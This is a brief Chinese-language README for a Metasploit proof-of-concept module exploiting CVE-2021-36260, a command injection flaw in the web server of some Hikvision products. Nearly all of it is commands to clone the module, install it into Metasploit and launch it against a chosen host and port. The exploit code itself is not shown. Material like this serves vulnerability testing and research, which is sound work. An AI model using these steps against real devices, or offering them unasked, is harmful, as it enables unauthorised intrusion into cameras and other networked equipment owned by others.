关于 CVE-2021-36260 的 metasploit 脚本(POC)。该漏洞存在于某些海康威视产品的 web 服务器中,存在命令注入漏洞,攻击者可通过发送带有恶意命令的消息来利用该漏洞发起命令注入攻击。
git clone https://github.com/TaroballzChen/CVE-2021-36260-metasploit
cd CVE-2021-36260-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp hikvision_web_server_build_210702_command_injection.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/hikvision_web_server_build_210702_command_injection.py
msfconsole
set rhost <vuln ip/host>
set port <vuln port>
set ssl <default: false for http>
exploit
